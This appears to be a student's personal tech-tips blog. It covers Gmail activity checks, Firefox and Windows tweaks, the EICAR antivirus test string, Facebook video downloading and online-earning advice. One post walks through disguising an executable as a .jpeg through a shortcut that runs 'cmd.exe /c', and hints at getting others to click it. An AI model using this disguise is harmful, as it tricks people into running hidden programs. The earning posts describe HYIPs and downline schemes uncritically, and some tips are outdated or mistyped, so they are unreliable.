Check your Gmail
If you’re worried about email security, here is a step by step guide to help you check and determine if your Gmail account has been hacked or compromised in any way.
Step 1: Find the ‘Last Account Activity’ Section Your Inbox
At the bottom of your Gmail inbox there is a ‘Last Account Activity’ section. Click on ‘details’ to launch the full blown monitor.
Step 2: See who has accessed your Gmail account recently
Next, what you’ll see is a table of the most recent activity from your Gmail account. It shows you
* How it was accessed (Browser/mobile etc)
* Where exactly the IP address is (So you can do some further digging)
* When it was accessed
Step 3: Understand the IP addresses – Has your Gmail really been hacked?
If you see IP addresses from different countries, don’t be too quick to panic. If you use any 3rd party services which hook-up to your Gmail account, they will almost certainly show up in your activity log. To do you own investigation, you can use DomainTools to identify the IP address. This will help you differentiate normal activity and your Gmail account being hacked.
Step 4: Understand the alerts – Google’s way of highlighting suspicious activity
Google will also do it’s fair share of monitoring, and will also alert you if it sees suspicious activity both in your inbox, as well as your recent activity log. When this happens, and the IP addresses look suspicious, it is advisable to play it safe, assume your Gmail account has been hacked, and change your passwords immediately.
Step 5: Sign Out All Other Sessions – If you forgot to sign out on a public computer
If you are worried you did not not sign out of a public computer, you can ‘sign out all other sessions’. This won’t fix any hacked Gmail accounts, but it will resolve any careless mistakes. This is also useful if you happen to lose your mobile phone and you want to ensure your email is not read by others.
Step 6: What to do if your Gmail account has really been hacked
The first thing you do is change both your password and security question right away. Then make sure your new choices are very secure. Google themselves have some really good tips . For example in the case of security questions:
* Choose a question only you know the answer to – make sure the question isn’t associated with your password.
* Pick a question that can’t be answered through research (for example, avoid your mother’s maiden name, your birth date, your first or last name, your socialsecurity number, your phone number, your pet’s name, etc.).
* Make sure your answer is memorable, but not easy to guess. Use an answer that is a complete sentence for even more security.
So there you have it. A step-by-step guide on fully understanding Gmail’s account activity log, and how to check if your Gmail account has been hacked :)
Run exe files as other files
Have you ever wanted to hide an exe file as a jpeg file? Mostly, students are not allowed to install computer games in their school's computer laboratories. I seriously wanted to do that once when I was in high school. Now, we can succesfully hide an exe file into a jpeg file. It opens and runs the program when you click on the jpeg file. Just follow these 14 steps carefully. This really works! Of course you have to have that exe file installed in your computer.
1. Create a new folder and make sure that the options 'show hidden files' is checked and ‘hide extensions for known file types’ is unchecked. Basically what u need is to see hidden files and see the extension of all your files on your pc.
2. Paste a copy of your exe file on the newly created folder. Let's just say it's called blog.exe (that's why you need the extension of files showing, cause you need to see it to change it)
3. Now you’re going to rename this blog.exe to whatever you want, let’s say for example: KiRA.jpeg
4. Windows is normally going to warn you if you really want to change this extension from exe to jpeg, just click YES.
5. Now, create a shortcut of this KiRA.jpeg in the same folder.
6. Now that you have a shortcut, rename it to whatever you want, for example, Me.jpeg.
7. Go to properties (on the file Me.jpeg) and now you need to do some changes there.
8. First of all delete all the text on field START IN and leave it empty.
9. Then on field TARGET you need to write the path to open the other file (the blog.exe renamed as KiRA.jpeg) so you have to write this: C:\WINDOWS\system32\cmd.exe /c KiRA.jpeg
10. The last field, c KiRA.jpeg is always the name of the first file. If you called the first file soccer.avi you gotta write C:\WINDOWS\system32\cmd.exe /c soccer.avi got it?
11. So what you’re doing is when someone clicks on Me.jpeg, a commandd will execute the other file KiRA.jpeg and the blog.exe will run.
12. On that file Me.jpeg(shortcut), go to properties and you have an option to change the icon. click that and a new window will pop up and u have to write this: %SystemRoot%\system32\SHELL32.dll . Then press OK.
13. You can set the properties HIDDEN for the first file (KiRA.jpeg) if you think it’s better to get a connection from someone.
14. But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.
Got it? It's just that simple! You can change exe file into any type of file you want, may it be avi, mp4, mp3, 3gp, etc. You just have to follow the steps above and change jpeg into those files.
Fixing Corrupted Files
Sometimes, when we have important files in our computer, some of them gets corrupted and becomes useless. If it's unusable then its as good as trash, right? But what if I say that you can use these files again? How would you like to know about fixing your corrupted computer files in 3 easy steps?
All you need is your windows CD, may it be a Windows XP, Vista, or Windows 7 CD. Of course, it has to match your operating system or else it won't work. Now follow these simple steps:
1. Insert your CD into your CD/DVD drive.
2. Press Windowkey+R(Run Hotkey) for XP or just Click on Start and select the command Run.
3. Type in "sfc /scan now" (without " "). Now it should all load, and fix all your corrupted files on Windows XP, Vista, or Windows 7 OS.
After that, your corrupted files are magically fixed. :)
Scam or Not?
If there are scammers in offline business, then there are also scammers in online businesses. A lot of people are being scammed everyday and we have to stop this. We all know that scamming is a way to get much money but it ain't the right thing to do. This is our lesson number 3 in Online Earning, how to know if these websites/people are scammers or not. The theories that you are gonna read are just based on my experience and it had been useful for me since I had been using a lot of programs. So come on and learn what you need.
SCAM PROOF #1: RATES
In theory, when we search for programs, we are often being sucked in by the big numbers we see on the homepages of these programs like $1 per click, $100 per email, etc. but the truth is no one, I repeat NO ONE is willing to pay someone that much just to do a simple job. That is obviously a scam site! And if it says up to $1 then you have just chosen your site!
SCAM PROOF #2: PAYMENT PROOFS
Wait up! Don't go registering yet. We still have to look for proofs from the site. Go to your chosen site's forum(if they have one) and look for PAYMENT PROOFS. If they have no forum, better find another site. If you've found proof of payments, check the dates carefully and if they're up-to-date then check their services. If you're not satisfied with that proof, better Google the "sitename+scam". It will take some time to read but it's worth the time. If it's not yet pronounced as a scam by other sites, then check their services.
SCAM PROOF #3: SERVICES
Now that you've proven that they're paying, it's time to look at their services. Services like forums, online support, contact pages, etc. The forum is a must-have for earning sites, because this is an alternative for people who wants to contact the staff and see if other members are getting paid and/or having problems. Online support is not that much needed but it would be very nice to have this feature for easy contact. Contact pages through e-mail is another must-have, even though it takes maybe 1,2 or 3 days to wait for a reply, it is very crucial that all queries are answered. Feel free to test these services as much as you can. If you have been satisfied by their services, then go ahead and register.
Well, that's all I can say for now.
Tune in for more lessons in Online Earning! :)
Downloading Videos in Facebook
Youtube is nice for uploading videos. Many users still prefer to upload their videos here, but not all people likes to upload on youtube. A lot of my friends use Facebook to upload their videos but the problem is I can't download 'em directly to my computer. I have to go and get the video from them directly. A very tiring job to do but worth it when you get what you want. :)
well, now, I just found a way on how can we download these videos that are uploaded to the Facebook stream. You don't need any hacking intel here, except for the thing called "common sense". :)
Here's how we are gonna do it:
1. Get the URL of the video. The page wherein you are viewing the video itself.
2. Open the source code of the page.
Opera users -- CTRL + U
Mozilla Firefox users -- CTRL + U
3. Open up the Notepad Application on your computer and copy the source code.
We have to copy the source for us to find the video itself.
4. Press CTRL+F on your notepad and type "video_src".
5. When you have found the "video_src", you'll see something like this:
("video_src", "http%3A%2F%2Fvideo.ak.facebook.com%2Fvideo-ak-sf2p%2Fv22832%2F247%2F52%2F108774812472006_30329.mp4")
6. Copy that part of the source from http to its extension. Change all "%2F" or "%2f" to "/" and "%3A" or "%3a" to ":".
It'll look like this:
http%3A%2F%2Fvideo.ak.facebook.com%2Fvideo-ak-sf2p%2Fv22832%2F247%2F52%2F108774812472006_30329.mp4
to
http://video.ak.facebook.com/video-ak-sf2p/v22832/247/52/108774812472006_30329.mp4
7. Paste it onto your browser's address bar and hit ENTER!
Your download would be finished in no time. :)
Note:
The extension/type of file is based on what the uploader's file.
Test your Antivirus!
Do you want to test if the antivirus you installed on your PC is working and effective? Here is a trick that can test it. Don't worry it contains no viruses or anything, just a block of codes. :)
1. Click on Start.
2. Select Run.
3. In the Open box type: notepad
4. Maximize the window.
5. Highlight the following on the following line of text:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
6. Right click on the highlighted text and choose 'copy'.
7. Switch back to Notepad.
8. Right click anywhere inside of Notepad and select 'paste'.
9. Click the File menu and select 'save as'.
10. Change the 'Save as Type' to 'all files'.
11. Name the file http://kira-guide.blogspot.com or any name you want.
If your antivirus has detected it, then congratulations! Your PC is now safe from viruses. But if it didn't detect it, then I suggest you better change your antivirus. Quick!
Speed up your Firefox
Every now and then, Firefox browser seems to be slowing down. Not only just the internet, but the browser itself also. This is caused by adding too many add-ons or many applications to your browser. Here are some tips and/or tricks that might help you in making your browser run faster.
1. Type about:config in the address bar and then press Enter.
2. In the filter search bar type network.http.pipelining. Be sure the value field is set to true,if not double-click to set true. HTTP is the application-layer protocol that most web pages are transferred with. In HTTP 1.1, multiple requests can be sent before any responses are received. This is known as pipelining. Pipelining reduces page loading times, but not all servers support it.
3. Go back to the filter search bar and type network.http.pipelining.maxrequests. Double-click this option and set its value to 8.
4. In the filter search bar and type network.http.proxy.pipelining. Once opened doubleclick on it and set it to true.
5. In IPv6-capable DNS servers, an IPv4 address may be returned when an IPv6 address is requested. It is possible for Mozilla to recover from this misinformation, but a significant delay is introduced.
Type network.dns.disableIPv6 in the filter search bar and set this option to true by double clicking on it.
6. CONTENT INTERRUPT PARSING. This preference controls if the application will interrupt parsing a page to respond to UI events. It does not exist by default. Right-click (Apple users ctrl-click) anywhere in the about:config window, select New and then Boolean from the pop-up menu. Then:
A. Enter content.interrupt.parsing in the New boolean value pop-up window and click OK
B. When prompted to choose the value for the new boolean, select true and click OK.
7. Rather than wait until a page has completely downloaded to display it to the user, Mozilla applications will regularly render what has been received to that point. This option controls the maximum amount of time the application will be unresponsive while rendering pages. Right-click (Apple users ctrl-click) anywhere in the about:config window, select New and then Integer from the pop-up menu.
A. Enter content.max.tokenizing.time in the New integer value pop-up window and click OK
B. You will be prompted to enter a value. Enter 2250000 and click OK.
8. CONTENT NOTIFY INTERVAL. This option sets the minimum amount of time to wait between reflows. Right-click (Apple users ctrl-click) anywhere in the about:config window, select New and then Integer from the pop-up menu.
A. Type content.notify.interval in the New integer value pop-up window and click OK.
B. You will be prompted to enter a value. Enter 750000 and click OK.
9. CONTENT NOTIFY ONTIMER. This option sets if to reflow pages at an interval any higher than that specified by content.notify.interval. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Boolean from the pop-up menu.
A. Type content.notify.ontimer in the New boolean value pop-up window and click OK.
B. You will be prompted to choose the value for the new boolean. Select true and click OK.
10. Notify Backoffcount. This option controls the maximum number of times the content will do timer-based reflows. After this number has been reached, the page will only reflow once it is finished downloading. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Integer from the pop-up menu.
A. Enter content.notify.backoffcount in the New integer value pop-up window and click OK.
B. You will be prompted to enter a value. Enter 5 and click OK.
11. CONTENT SWITCH THRESHOLD. You can interact with a loading page when content.interrupt.parsing is set to true. When a page is loading, the application has two modes: a high frequency interrupt mode and a low frequency interrupt mode. The first one interrupts the parser more frequently to allow for greater UI responsiveness during page load.
The low frequency interrupt mode interrupts the parser less frequently to allow for quicker page load. The application enters high frequency interrupt mode when you move the mouse or type on the keyboard and switch back to low frequency mode when you had no activity for a certain amount of time. This preference controls that amount of time. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Integer from the pop-up menu.
A. Enter content.switch.threshold in the New integer value pop-up window and click OK.
B. You will be prompted to enter a value. Enter 750000 and click OK.
12. NGLAYOUT INITIALPAINT DELAY. Mozilla applications render web pages incrementally, they display what's been received
of a page before the entire page has been downloaded. Since the start of a web page
normally doesn't have much useful information to display, Mozilla applications will wait
a short interval before first rendering a page. This preference controls that interval. Rightclick (Apple users ctrl-click) anywhere in the about:config window and select New and then Integer from the pop-up menu.
A. Enter nglayout.initialpaint.delay in the New integer value pop-up window and click OK.
B. You will be prompted to enter a value. Enter 0 and click OK.
After doing these things, your browser is now running in its best condition. Also, maintain your browser clean from add-ons. Do not install anything unless you need it. If you need for one time only, you should uninstall it after you have used it as this really makes your browser run slower.
E-Currencies (Online Money)
This is lesson number 2 in online earning. After giving you a brief background on the categories of online earning, we will now tackle about the requirements.
The only requirement that you need to have is an e-wallet, short for Electronic wallet. Now, there are lots of these e-wallets running around these days. You have probably heard of Paypal, Alertpay and Liberty Reserve right? Well, These three are the most common e-wallets used.
Paypal is good because it is widely known and it is also accepted in most countries and online shops like e-bay. Well, I could say this is the no.1 until recently, my account got limited for no reason. Whe your account gets limited, you are not able to send/request payments and a bunch of other stuff. The only thing you could do is to receive payments until you lift the limitation. You can only lift it if you verify your account with a credit card, then verify banks, change your password and answer some security questions. I do not recommend this to you if you do not have any credit card.
Go to http://www.paypal.com to register for an account.
Next in line is Alertpay. This is the second most popular e-wallet around. It is also widely used but I don't seem to see it on some online shops. Verifying your account is now an easy job. You just need a mobile phone to verify it, unlike Paypal. I have verified my account in just seconds and I consider it as my 2nd payment processor. I prefer a Personal Pro account as it has more features to use than Personal Starter.
Sign up for a Personal Pro or a Business account here:
Third and lastly is Liberty Reserve, this is used by a lot of investors and traders. This is the only e-wallet that has the lowest fees for sending and receiving. Although, a lot of online shops don't support LR, it is the most convenient processor of all. I can't say much about LR, but this is my main payment processor.
Register for an account here:
There are a lot more e-wallets or payment processors that online marketers use, but these are three most commonly used. Others are Strictpay, HD-money, Moneybookers, Perfectmoney, etc.
Speed up your slow computer
This trick is 100% proven and tested! This works best in computers with 1 GB below and 1.8 GHz processor speed below. This is very useful when you see your computer getting slow because of some applications that are using big amounts of RAM. just do the following:
1. Right click on your Desktop > Select New > Click Shortcut
2. Type: %windir%\system32\rundll32.exe advapi32.dll,ProcessIdleTasks and click next
3. Then, put a name for the shortcut you just made, ex. Maintain Memory
4. Click Finish
Just click on the shortcut you made whenever you feel that your computer is getting slow. The trick is just for getting our computer to its normal processing speed.

Earning Money Online
Did you know that there are a lot of ways in earning money online? A lot of people have been earning online for years, and some keep it as a secret so they can earn for themselves and don't let others get what they have. Today, I will let you know what are the different earning programs that you can see online and what are these exactly and how you earn from them. You'll be dealing/reading more about these programs later on.
Here are some of the popular jobs on the net:
Paid-To-Click
-- Paid-To-Click are the programs wherein you are paid for clicking the advertiser's websites. You have to view them for a given time, the maximum is 30 seconds and the minimum is 10 seconds. These kind are the most popular, lots of people use this. Although, it's tough but It's alright when you get paid by them. I recommend this for leisure time only. Also good for bringing traffic to your sites.
Paid-To-Surf
-- Paid-To-Surf programs are in which you get paid by just surfing through the net. I haven't been a member of any surf site but I know that the rates here are low, so I recommend this one for heavy internet users.
Paid-To-Review
-- Paid-To-Review are programs wherein you will get paid by reviewing a things. Sime sites have specific things that you should review and others can review anything they want. Also rates are low but if you are good in this field, I recommend this to you.
Paid-To-Read
-- Paid-To-Read programs are the easiest jobs that you can do here, you just read mails that the site is sending to your mail, reading is nice but also rates are low.
Paid-To-Join
-- Paid-To-Join programs are programs are where you are asked to join somebody's site for a price. I do not recommend joining this kind of sites 'coz sometimes, they ask you to be active in the sites that they ask you to join with.
Paid-To-Survey
-- Paid-To-Survey programs are wherein you asked to answer some surveys from companies and other sites. This, I do not recommend it for Asian people though, we only get little surveys in a month.
Paid-To-Post
-- Paid-To-Post programs are earning forums, you get paid for posting in their forum. Some forums have contests that helps you earn a lot, rates are low but if you are a forum-type of person. This is very good for you.
Paid-To-Promote
-- Paid-To-Promote programs are in which you promote a product or something and you earn a commission for doing it.
Paid-To-Write
-- Paid-To-Write are programs wherein you are blogging or even reviewing an item or thing. You get paid by the quality of your posts and how long it is. Be careful though on what you write 'coz you get benned if you spam. Recommended for people who loves writing.
High-Yield Investment Programs
-- HYIP's or High-Yield Investment Programs are programs that you earn by investing a small amount of money and earn with a day-to-day percentage. There are two types: Short term and Long term investments. Short term are only for 1,2, or 3 days and long term are longer than 10 days.
Auto surf and Manual Surf
-- Auto Surf and Manual Surf programs are in which you can get free traffic to your site while you earn, well, it's hard to earn in these kind of programs I'd say. My only purpose in these kind of programs is the traffic.
Affiliate Programs
-- Affiliate Programs are in which you get other people to sign up under you and you gain from them too or some sites get you to sell their product and you get comission from it. Recommend it for people who are good at inviting people.
Forex
-- Forex sites, I really do not know but I know that it's about trading and stuff.
Online Casinos and Betting
-- Online Casinos and Betting are programs which are practically in a win-lose situation or a 50-50 situation, I might say. You either win or lose, it's gambling. I, personally, do not recommend this type.
Matrix Sites
-- Matrix Sites are programs that allow you to earn by just referring or building your own downline. Every person you refer, you earn a given amount. The more people you refer, the more you earn from them. And when your referrals refer more, you earn a commission, so the deeper your downline is, the more you earn also.
and a lot more ...
But I must warn you though, 95% of these programs are scams and only 5% are LEGIT and paying. I have been in this business for about 3 months now and have learned that it isn't easy looking for legit sites. Some sites may be legit this time but after a week, month or so, it may become just like the others, a BIG scam.

Who is the Author?
Hello there! Before I begin, I'm happy to announce that I have successfully found a suitable theme for my blog. Finding the right theme is very hard for me because I had to search for about 2-3 months and modified some of its parts in one whole day. Although there are some parts that I haven't touched yet, I feel that I had to start writing a couple of posts now since I always edit the first article that I have ever wrote.
This is my first time in the blogosphere so I don't exactly know what to tell you for my first post, so maybe I'll just introduce myself and about the blog? hehe
My internet-name is KiRA, you may find me in some local and international forums as "kiray" or even "kiratot". I use these names when "KiRA" is unavailable to use. I'm just a regular student who's currently taking up Software Development in AMA Computer Learning Center and graduation is just right on the corner this coming March. The image above is the common image that I commonly use as my avatar on different forums, so if you see this image associated with the mentioned usernames, that's probably me. You may contact me through those sites and also through my email, which I do not know how to put in yet. :)
I love making friends online because even though they're so far, I can actually interact with them on forums and other sites. Being in forums opened my doors to earning extra money while I am online, especially when I'm in Facebook and other social sites. This helps my family in paying tuition fees and other house bills. You'll see some posts about earning later. :)
I really intended this blog for giving information about the things that I think could help anyone especially newbies in earning online, and I would also like to blog about my day-to-day experiences and give out some mini tutorials on different topics.
I also have integrated a chatbox over there so we can chat and get to know each other. You may leave some comments and contact me there. You can register so I will know you when we chat. :)
You can also subscribe to my blog through RSS, email feeda and by following this blog through Facebook, Twitter(Honestly speaking, I don't know what to do with twitter) and by the Follower's button in the main page.
I have also put on a poll about the blog which will be valid until there are a total of 100 votes casted, I would be making it on a weekly basis when all 100 votes are casted for the first poll. Poll of the week would be the viewers' choice, that means YOU. I will choose from the questions that you may post at the chatbox area.
Well, that's all I can tell you for now, my mind just went blank. Haha
If you know anyone who would like this blog, don't hesitate to tell them. I would really really appreciate it. More viewers means more friends. Yay! :)
